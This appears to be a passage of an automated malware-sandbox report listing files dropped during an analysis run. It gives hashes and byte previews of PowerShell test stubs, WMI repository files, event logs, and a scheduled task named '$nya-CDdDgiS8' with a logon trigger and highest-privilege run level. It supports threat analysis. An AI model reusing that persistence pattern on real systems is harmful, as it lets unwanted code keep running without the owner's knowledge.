                                                                                                    Preview:p...... ....(....2Q.....(.......2........F0I......rJ......................rJ... ...................................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.n.5.b.s.K.V.V.V.8.k.d.J.6.v.H.l.3.O.1.J.0.%.3.D...

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_01wu0e41.k5b.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12bh2lq2.hrr.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_juu0134s.uak.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uleos0xj.tfx.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vdozkv1b.0ii.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuqcu0uw.3ge.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Windows\System32\Tasks\$nya-CDdDgiS8

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (4622), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12424
                                                                                                    Entropy (8bit):3.9111521387304484
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:1Ok4xn9THNx0VtggdKTSnNTRZKnRSWdxK3WNIsW1dKtggdKObgRD+0MnaC6HYnws:Qn9Y4Tp2KfitfP7X+
                                                                                                    MD5:4F5119B2163E5B70F8F8ABD45F57B009
                                                                                                    SHA1:3BA519DE477711E0411735AF0302D7CE2206D332
                                                                                                    SHA-256:F85553EC9583109F92DBA4A302AAA99CC7D3723E84CCABE7BE1B17C932CBA148
                                                                                                    SHA-512:4F0CEC539483281FDA7402B1AC34A8DDF4FC6D8DB3EDB87BDBC6934B6FFF2A1FE366C76CD006E23561E0180473A450867138566533FF595205C0B6E32EF50EA5
                                                                                                    Malicious:false
                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.3.-.1.3.T.0.5.:.3.3.:.3.3...4.7.6.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.n.y.a.-.C.D.d.D.g.i.S.8.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.B.U.I.L.T.I.N.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .

                                                                                                    C:\Windows\System32\wbem\Repository\INDEX.BTR

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):44113920
                                                                                                    Entropy (8bit):5.05177724723175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:cKMQsNg+UwKd/xL9UQvNCLjY9RWphzdUuuSFOzti1e0N9RsnnqDNR7X65tUK2ZUG:Uputzn4oKZ
                                                                                                    MD5:7EA2AA82E96CC6ECEB22208B48215F28
                                                                                                    SHA1:20326EAE5343F7E53E037D210CEAA4FD1321CCCB
                                                                                                    SHA-256:6B1280F81032C053D825C1CD594F99B1D929881B5F253B6E3814ED37E36A3337
                                                                                                    SHA-512:E9D7A04C658C641865CB5DFE16485C868FABBEAEC3FCC49D6BD4B5D4AB5C00EF4E06266BD30CADA23BFF710C7740E6E5F18A25ACED1A10FA094E20EC2668328E
                                                                                                    Malicious:false
                                                                                                    Preview:...............?...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W.Q...<.*.!.9.E.6...x.....$.T.K...Z.-.........u.0...'.....N.......c.].~.f...`.......o.......3...l.r...?.....H...i...B...{.....?.....?.....?.....?.....?.....?. ...?.'...?.*...?.;...?.-...?.9...?.....?.....?.....?.....?.....?.....?.0...?.....?.....?.....?.5...?.<...?.....?.8...?.....?.....?.....?.....?.....?.....?.$...?.(...?.#...?.&...?.:...?.2...?.,...?.3...?.....?.....?.>...?.%...?.....?.+...?.6...?.1...?.!...?./...?.....?.....?.4...?.....?.)...?.....?.....?.....

                                                                                                    C:\Windows\System32\wbem\Repository\MAPPING1.MAP

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):445120
                                                                                                    Entropy (8bit):3.7425442490499385
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:WFajhEeTlRcqLBixs11mUTBDWGm/nlua7np3:G
                                                                                                    MD5:9D2F9AD94EDD6EF937D7F09B160970BD
                                                                                                    SHA1:37BBE84B40CA631957CC9EF33C8075A9B134DBA5
                                                                                                    SHA-256:AAFDC72E9D9AEF9DD48489C3C895BBE782DAB61B542C2629AAB9EFC707A0C266
                                                                                                    SHA-512:01046681B5A279A007D7449D019D0B2B9F4D4C64DFE2C5A5F1269EBCAA880FB52EF3203C277D6052460521447E19E86A78139AC155EE4B07245014941EF907AF
                                                                                                    Malicious:false
                                                                                                    Preview:...Gt..............>..........G......................Dta...................-..T....................qS.).....................(`f.....................}.[.....................S..................n...R............. .......y.........................W........................t......................y.)...........`.......y.S.................L...?]E./...............o......#............ ...j...._..............'...=.....D.C....................q..\...................]...'....................k/Y............>...........................!...I3'.......................Bv....................=..a....................G..........................Z...............X.....<8.....................72.O..............."...k........................c.'T....................E..................$...04.;....................k#.................. ..._...................#....<j.c...........................................!...&...............%....z..~...............&...e.'.................(...Z.w.r...............'....h..>.......

                                                                                                    C:\Windows\System32\wbem\Repository\MAPPING2.MAP

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):445568
                                                                                                    Entropy (8bit):3.749415753475971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:RxL9A9f0j1mXVAylXVNEkHJ/5IpxZD6rpfCSSgn:q
                                                                                                    MD5:1767101D1BF79B8C1A0371B2D3F2A56D
                                                                                                    SHA1:7F6C0E17996DF3015690CCC5C61CE71E9347941F
                                                                                                    SHA-256:26B62889378215CA5CFE373BDEE5F0D076234A8E6307201CA384CB9FC798EFF9
                                                                                                    SHA-512:B1EC5C7C0CD32E825E69849A76C3AFCC46B97484193A6B798C6AEB1EC6CFF07F59B64C38FFF6FF2CBA86DAA82543FFDAE9F8C2067687D142E3A775FECDF99C86
                                                                                                    Malicious:false
                                                                                                    Preview:....y..............>..........G......................Dta...................-..T....................qS.).....................(`f.....................}.[.....................S..................n...R............. .......y.........................W........................t......................y.)...........`.......y.S.................L...?]E./...............o......#............ ...j...._..............'...=.....D.C....................q..\...................]...'....................k/Y............>...........................!...I3'.......................Bv....................=..a....................G..........................Z...............X.....<8.....................72.O..............."...k........................c.'T....................E..................$...04.;....................k#.................. ..._...................#....<j.c...........................................!...&...............%....z..~...............&...e.'.................(...Z.w.r...............'....h..>.......

                                                                                                    C:\Windows\System32\wbem\Repository\OBJECTS.DATA

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8282112
                                                                                                    Entropy (8bit):5.0173901623394555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:3FtFyL5XyaYugg+st4jWBmnqnDBgDZdLrnCDSdp9n/q7kwE1cHPnyN1qcHun3qzg:oCRpIPT
                                                                                                    MD5:DD5D92E2CCAEA34A11A0E6C78ED88944
                                                                                                    SHA1:1A0B6387869F76D897139996C7775AD35B5BFDEF
                                                                                                    SHA-256:5718E987AA084E0A05DF99B641C1C7EB8AC4A80DD7C7A712942619815B1D0193
                                                                                                    SHA-512:1A08A70075D570104CE4B6FA31075BDD950ACBC639D9BE76A583A76B35D352E3838CFB758C3983290B0C2D9E03CAC438BAC443BC263E947F47F921770ED9822A
                                                                                                    Malicious:false
                                                                                                    Preview:.4L.............q.;T.... ........$...............xG....................!.......1.Of1...............M...%.......q..Ar...........L................'.(............x..M.............'...............c.*............\.A.............%-vO.............[...............$..%............\m.8...........ts.=H.............#Y............gYGg.............m|v..............~............Q.E............c......^.......................4.8.9.0.E.F.F.4.1.3.4.8.A.2.D.3.F.A.1.0.4.A.8.5.C.8.0.7.5.E.2.0.E.0.2.5.F.7.C.F.4.0.D.0.0.4.E.2.B.C.1.C.3.C.9.A.A.5.4.8.6.5.F.4.....b...t_.%.............!...l..M.............c....WDMClassesOfDriver..__namespace..C:\Windows\System32\drivers\en-US\processr.sys.mui[PROCESSORWMI].4.8.9.0.E.F.F.4.1.3.4.8.A.2.D.3.F.A.1.0.4.A.8.5.C.8.0.7.5.E.2.0.E.0.2.5.F.7.C.F.4.0.D.0.0.4.E.2.B.C.1.C.3.C.9.A.A.5.4.8.6.5.F.4.....b...t_.%.............+...l..M.............m....WDMClassesOfDriver..ProcessorAcpiTssState..C:\Windows\System32\drivers\en-US\processr.sys.mui[PROCESSORWMI].4.8.9.0.E.F.F.4.1.

                                                                                                    C:\Windows\System32\winevt\Logs\Application.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):67928
                                                                                                    Entropy (8bit):3.9229494413252977
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:NyzyObo0zq01qMhcgbPquI4q6uqoa2cN:NoHvN7hcOLIaacN
                                                                                                    MD5:2ED44D60A9A8E42D625DAC52B120A9EC
                                                                                                    SHA1:80D31DD76CBED9654D1A4867CA9EE79BDE1CFC61
                                                                                                    SHA-256:AFA392EC157D72537AA28F537C52C0268FA55A0EE81F9568D43D65E377AB300C
                                                                                                    SHA-512:845B49E12DFE41970FACA7DE6B33DF811D1471F6FCAF48A6E7C01170429F880B845A4142E6E881B9A517951A53919CE3E6FE8A08CCB1DD3129E09DA28DDEA2C2
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........................................X...xc.q.....................................................................p)............................................=...........................................................................................................................g...............@...........................n...................M...]...........................j...............................&.......................................................................................**..X.............w.............&.........}.]..+..$.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.299690454077833
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:hVUHiapX7xadptrDT9W84bW664k5Xyvkzr:gHi6xadptrX9WPbR
                                                                                                    MD5:98386C6D43F234E4E9A07E6AD0B3DC34
                                                                                                    SHA1:D970DDA7E2EDA66F3B4B17185E84BD1C920D79C2
                                                                                                    SHA-256:418F39A1280B2C34368342BF2B6D112464C313193CEA3D327AEA7AE6AAAE2B9F
                                                                                                    SHA-512:0B3E054F154BB92470A1B77D8650C876217AE655A9778AB7592A0F9F98B050056D9607705C4A26D258C41F04E2D5908273168C32E8C6683AE3047611223BBC4E
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........\...............\...........0..........U.......................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.389052726027393
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:PhGN+3N6sNSNYNLNjNUSNbN6NHNRNbNYN0NsNZN7NhNLNPNhN8NdNixNAwNioNZN:PGvsbF1QBjr1h8RE5kDYFX
                                                                                                    MD5:D00C86B2144A73E197F7EB1101EE55A0
                                                                                                    SHA1:7D9F6D7FE4AF26732C85F19F6F436C687C503221
                                                                                                    SHA-256:3E0AD86DCFB08C6A8369F268EF28A43209109D5EE98B0C896C19696E2EEA4CD1
                                                                                                    SHA-512:66AAFA38E71D2E5CC380B23B9DDDE4E30FB2D805719E251E94B61DD5C0890D8D354152D918ECAF9C41FDD6137F3118CB778F29685C04ECEFF45FED7BA2401F13
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................8.......N.".....................................................................*d.>................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F....................C.......................J...............................................................i...................F......e...........**..............."s...........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76784
                                                                                                    Entropy (8bit):4.22400854562245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:z6r2V+VmV9V0VGVaVAVEV3V5VfuxVBVYzVHVPVnVGVdVhV9VsVi6rGOhcbVoVGxm:z6c6COO/DE
                                                                                                    MD5:9EB93F6939A0A3E5F5478EBCE55C50AF
                                                                                                    SHA1:1D30F200736B5FB388AD2C4667295C779043AA22
                                                                                                    SHA-256:63CA61BD5711E5938A03BD4193DA8F9EC412F992BE3CF24ED5832C50DC864A89
                                                                                                    SHA-512:BEC0BE678D62D357A5D5DDC9D73D7791083FDDB19F36A0DF272C32ACA110687BA809B692ED75DD328B43C74A77063E91EDBB290E27452A09566DFE9BAD4C338C
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.r...............r.......................p....>........................................................................3C................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...i.......**...............;...........F..&...............................................................@.......X.....!.....E..........@.;........c....0..c................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........n...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...C.o.n.t.e.n.t.D.e.l.i.v.e.r.y.M.a.n.a.g.e.r._.c.w.5.n.1.h.2.t.x.y.e.w.y............

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.426118770462063
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:YhsmYDQlm9cKrRtUmNmHumtTmgm5wQXvZ7bmO8mfQE3mq9mqmxqm6nFmCWmnsngS:YMrJcWHvqisqnvokZRKDSTSPnSKn
                                                                                                    MD5:6CFCE5264B03874517AA6A241A8712CC
                                                                                                    SHA1:578077104B758C95EDEDBC3C0928D8CF7FDB0197
                                                                                                    SHA-256:FEF379560AC56A639FFDA5047E65813DE46BEB245DF43727B9C97B5090682636
                                                                                                    SHA-512:EE3281EF8E843F0F019C530A4CE7806963A34F4EED7E8B30BF8EDB2D23639C792ACEEAA2DEB21E1DA6A483766982E2054A19651D77EC811A0CEE6934D4671184
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk..0.......0.......0.......0..........@... .....V....................................................................;G..................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...................................C\..........................................KJ...............H..;d.......X..............#...........%...........**.......0....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.46200461277087884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:VNVaO8sMa3Z85ZMLe5yrjjv3Z85ZCtV3Z85Z63Z85Zu:fV7pp8nMLe8vvp8nCtVp8n6p8n
                                                                                                    MD5:C6929DB77108728E343BCE40259E0BAC
                                                                                                    SHA1:604C49BFE289109840D00562C42959B3CF82CB77
                                                                                                    SHA-256:5C2EBD5E8EA3E9AEEF114C9E30A5093D86B124C41BE4B5D2F7D0D8E59567663F
                                                                                                    SHA-512:B0B3550BCE3B37618AA5A0CA44E3CB133D064FCC0A79F89DF8A7919FEA8BD8CB0EAF4B4A58F625FA8DAE3FF8A5A82DAFEF935355EA711E8061DE1D8FFB444967
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................P.......r.B.....................................................................;.#............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.8379894896429115
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Vhv3Iqd5e3T3IQ3W3yD3C3Bq313nQ3s13sJ:VTRwgEjWJ
                                                                                                    MD5:B078FFE7DE6C5CF7C1ED91A26847D26C
                                                                                                    SHA1:B3A7F040C30D8E292F773E33B440CFDFCC893A92
                                                                                                    SHA-256:8E46EE6EA8630FC9262C42199E2047FBA64D95AF37D0FEF4AEEA06D077089596
                                                                                                    SHA-512:8C925B820112D38F7EF13487E30AE461DDF7F427766F8B51939728E2375FCDCDDB00DB1E877D4EDBB10FB3AD8C7E1DE6A4C6B3D7AA88E10831BB19038DE3D213
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.d.......n.......d.......n...........H!...#..1.z.....................................................................m&k1............................................=...............y...........................................................................................................L...............?...............................................M...F...........................................&.......................................................................................n...............**......d...........b............&............LS.....'.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:MS Windows Vista Event Log, 5 chunks (no. 4 in use), next record no. 397, DIRTY
                                                                                                    Category:dropped
                                                                                                    Size (bytes):120552
                                                                                                    Entropy (8bit):4.516142412940574
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:R2YHMtCwJYJRJ0D8IqRISAaH4X2YHMtCwJYJRJ0D8IqRISAaH4XzbubAb3b:UYstr677Ystr67K68z
                                                                                                    MD5:906A7E86F5A644CAD27B0C5B93E3339D
                                                                                                    SHA1:2DE94FAAAF599462D7367B9C8E1CF0F8138F3686
                                                                                                    SHA-256:BF782324845E3077C7D33A3DD7895518C865A8D8570D216D69D7650B2B771FF7
                                                                                                    SHA-512:467258CB07EBA37693183BD5726B43AE56C203FE475C5E0FCD5B077725950F6A5FC5E1A656AD3CD699A8F86194C8F0EB26C58275F761A15CDFBB2C7FB024216C
                                                                                                    Malicious:false
